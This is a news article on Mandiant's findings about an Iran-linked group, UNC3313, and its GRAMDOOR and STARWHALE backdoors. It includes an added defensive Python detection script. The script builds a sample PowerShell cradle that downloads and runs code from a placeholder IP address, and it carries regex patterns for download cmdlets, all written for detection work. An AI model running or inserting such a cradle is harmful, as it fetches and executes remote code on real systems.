Iranian Hackers Employ Telegram Malware to Target Middle East Government Organization

Two custom backdoors were employed against an unnamed Middle East government entity in November 2021.

 

An Iran-linked hacking group, tracked as UNC3313, has been observed deploying two new custom backdoors, tracked as GRAMDOOR and STARWHALE. The backdoors were used in an attack against an unnamed Middle East government entity in November 2021.

According to cybersecurity firm Mandiant, the UNC3313 hacking group is associated with the MuddyWater state-sponsored group. "UNC3313 conducts surveillance and collects strategic information to support Iranian interests and decision-making," researchers stated. "Targeting patterns and related lures demonstrate a strong focus on targets with a geopolitical nexus." 

Last month, in January, U.S. intelligence agencies publicly categorized MuddyWater as a subordinate element of the Iranian Ministry of Intelligence and Security (MOIS) that has been active since at least 2018. UNC3313 initially gained access via spear-phishing messages, then used publicly available offensive security tools and remote access software for lateral movement and for maintaining access to the environment.
 
The phishing emails tricked multiple victims into clicking a URL to download a RAR archive hosted on OneHub, which opened the way to installing ScreenConnect, a legitimate remote access program, to gain a foothold.

"UNC3313 moved rapidly to establish remote access by using ScreenConnect to infiltrate systems within an hour of initial compromise," the researchers explained, adding the security incident was quickly contained and remediated. 
 
In the successive phases, threat actors escalated privileges, carried out internal reconnaissance, and attempted to download additional tools and payloads on remote systems by running obfuscated PowerShell commands. 
 
Mandiant researchers also spotted a previously undocumented backdoor called STARWHALE, a Windows Script File (.WSF) that executes commands received over HTTP from a hardcoded command-and-control (C2) server.
 
The second implant unearthed by the researchers was GRAMDOOR, notable for using the Telegram Bot API for network communication with the attacker-controlled server in order to evade detection, once again underlining the abuse of legitimate communication platforms to facilitate data exfiltration.
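The three behaviours described above (obfuscated PowerShell used to fetch additional payloads, a .WSF script host beaconing to a C2 server over HTTP, and a non-messaging process talking to the Telegram Bot API) each leave a distinct footprint in endpoint telemetry. The following detection logic is an added example written for this article, not code from Mandiant or from the incident; the Sysmon-style event format, the process names, the rule names and all sample values (including the 203.0.113.45 address) are constructed assumptions. It decodes `-EncodedCommand` payloads, correlates process creation with later network events by PID, and raises an alert for each pattern.

```python
"""Added illustration: simple correlation rules over constructed endpoint telemetry
for the tradecraft described in the article. Nothing here comes from the incident."""
import base64
import re

TELEGRAM_API_HOST = "api.telegram.org"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Processes for which Telegram API traffic is expected (assumed allow-list).
EXPECTED_TELEGRAM_CLIENTS = {"telegram.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# PowerShell cmdlets/aliases typically present in a download cradle.
DOWNLOAD_CUES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; returns '' on malformed input instead of raising."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Constructed cradle used only to build the sample PowerShell event below.
ENCODED = encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/p')")

# Constructed sample telemetry, one dict per event (simplified Sysmon-like fields).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4101, "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\update.wsf"},
    {"type": "network", "pid": 4101, "image": "wscript.exe",
     "dest_host": "203.0.113.45", "dest_port": 80},
    {"type": "network", "pid": 5222, "image": "svchost.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"type": "network", "pid": 6010, "image": "telegram.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"type": "process", "pid": 7001, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"type": "process", "pid": 7002, "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
]


def detect(events):
    """Return (pid, rule_name, detail) tuples for every matching event."""
    alerts = []
    wsf_pids = set()  # PIDs of script hosts that launched a .wsf file
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            if image in SCRIPT_HOSTS and ".wsf" in cmd.lower():
                wsf_pids.add(ev["pid"])
            elif image == "powershell.exe":
                m = ENC_FLAG.search(cmd)
                if m:
                    plain = decode_ps(m.group(1))
                    if DOWNLOAD_CUES.search(plain):
                        alerts.append((ev["pid"], "encoded_powershell_download_cradle", plain))
        elif ev["type"] == "network":
            # A .wsf script host opening an HTTP(S) connection is the STARWHALE-style pattern.
            if ev["pid"] in wsf_pids and ev["dest_port"] in (80, 443):
                alerts.append((ev["pid"], "wsf_script_host_http_beacon", ev["dest_host"]))
            # Telegram Bot API reached by a process that is not a known Telegram client.
            if ev["dest_host"].lower() == TELEGRAM_API_HOST and image not in EXPECTED_TELEGRAM_CLIENTS:
                alerts.append((ev["pid"], "telegram_bot_api_from_unexpected_process", image))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"pid={pid} rule={rule} detail={detail}")
```

The PID correlation matters: a script host is unremarkable on its own, and a single HTTP connection is too, but the two together from the same process are what the article describes. The Telegram rule is deliberately an allow-list check rather than a block, since legitimate clients on a workstation will also contact api.telegram.org.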
 
Mandiant's findings align with a recent joint advisory published by cybersecurity firms from the U.K. and the U.S. that accuses the MuddyWater group of espionage campaigns targeting the defense, local government, oil and natural gas, and telecommunications sectors worldwide.